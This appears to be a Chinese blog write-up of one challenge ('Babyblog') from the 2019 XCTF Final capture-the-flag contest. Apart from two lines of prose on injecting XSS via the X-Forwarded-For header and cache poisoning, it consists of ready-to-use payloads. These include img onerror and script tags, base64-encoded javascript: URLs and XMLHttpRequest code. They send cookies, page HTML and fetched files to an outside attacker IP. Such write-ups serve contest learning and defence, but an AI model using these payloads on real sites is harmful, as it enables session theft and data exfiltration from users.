南溟丷

我想在那里最蓝的大海扬帆

0%

2019 XCTF Final 部分题解

Xirshir先辈TQL

Babyblog

发现xff可以注入,且/user.php/xxx后访问有缓存。

大致思路即为xff写入xss脚本,访问/user.php/xxx生成缓存发送给后台访问。

1
<img src=x onerror="this.onerror=null;this.src='http://120.77.215.95:2333/?'+btoa(document.cookie)"//
1
<meta http-equiv="refresh" content="0;url=/flag"
1
2
3
<script>
window.location.href = 'http://120.77.215.95:2333/?' + btoa(document.cookie)
</script>
1
/passport?image=%2Fstatic%2Fhead.jpg&island=&fruit=&name=&data=amF2YXNjcmlwdDp3aW5kb3cubG9jYXRpb24uaHJlZiA9ICdodHRwOi8vMTIyLjUxLjExMy4xNjQ6MjMzMy8/JyArIGJ0b2EoZG9jdW1lbnQuY29va2llKQ==%27%3b%0aopen(atob(data))%3b%2F%2F
1
http://134.175.231.113:8848/passport?image=%2Fstatic%2Fhead.jpg&island=&fruit=&name=&data=amF2YXNjcmlwdDp3aW5kb3cubG9jYXRpb24uaHJlZiA9ICdodHRwOi8vMTIyLjUxLjExMy4xNjQ6MjMzMy8/JyArIGJ0b2Eob3BlbmVyLmRvY3VtZW50LmJvZHkuaW5uZXJIVE1MKQ==%27%3b%0aopen(atob(data))%3b%2F%2F
1
2
3
4
5
6
7
8
var request = new XMLHttpRequest();
request.open('GET', '/island/test_03.png', true);
request.onload = function() {
if (this.status >= 200 && this.status < 400) {
var resp = this.response;
window.location.href = 'http://122.51.113.164:2333/?' + btoa(resp)
}
request.send();
1
amF2YXNjcmlwdDp2YXIlMjByZXF1ZXN0JTIwJTNEJTIwbmV3JTIwWE1MSHR0cFJlcXVlc3QoKSUzQiUwQXJlcXVlc3Qub3BlbignR0VUJyUyQyUyMCclMkZpc2xhbmQlMkZ0ZXN0XzAzLnBuZyclMkMlMjB0cnVlKSUzQiUwQXJlcXVlc3Qub25sb2FkJTIwJTNEJTIwZnVuY3Rpb24oKSUyMCU3QiUwQSUyMCUyMGlmJTIwKHRoaXMuc3RhdHVzJTIwJTNFJTNEJTIwMjAwJTIwJTI2JTI2JTIwdGhpcy5zdGF0dXMlMjAlM0MlMjA0MDApJTIwJTdCJTBBJTIwJTIwJTIwJTIwdmFyJTIwcmVzcCUyMCUzRCUyMHRoaXMucmVzcG9uc2UlM0IlMEElMjAlMjAlMjAlMjB3aW5kb3cubG9jYXRpb24uaHJlZiUyMCUzRCUyMCdodHRwJTNBJTJGJTJGMTIyLjUxLjExMy4xNjQlM0EyMzMzJTJGJTNGJyUyMCUyQiUyMGJ0b2EocmVzcCklMEElMjAlMjAlN0QlMjAlMEFyZXF1ZXN0LnNlbmQoKSUzQg==
1
/passport?image=%2Fstatic%2Fhead.jpg&island=&fruit=&name=&data=amF2YXNjcmlwdDogdmFyIHJlcXVlc3QgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsgcmVxdWVzdC5vcGVuKCdHRVQnLCAnaHR0cDovLzEzNC4xNzUuMjMxLjExMzo4ODQ4L2lzbGFuZC90ZXN0XzAxLnBuZycsIHRydWUpOyByZXF1ZXN0Lm9ubG9hZCA9IGZ1bmN0aW9uKCkgeyBpZiAodGhpcy5zdGF0dXMgPj0gMjAwICYmIHRoaXMuc3RhdHVzIDwgNDAwKSB7IHZhciByZXNwID0gdGhpcy5yZXNwb25zZTsgd2luZG93LmxvY2F0aW9uLmhyZWYgPSAnaHR0cDovLzEyMi41MS4xMTMuMTY0OjIzMzMvPycgKyAocmVzcCk7fSB9OyByZXF1ZXN0LnNlbmQoKTs=%27%3b%0aopen(atob(data))%3b%2F%2F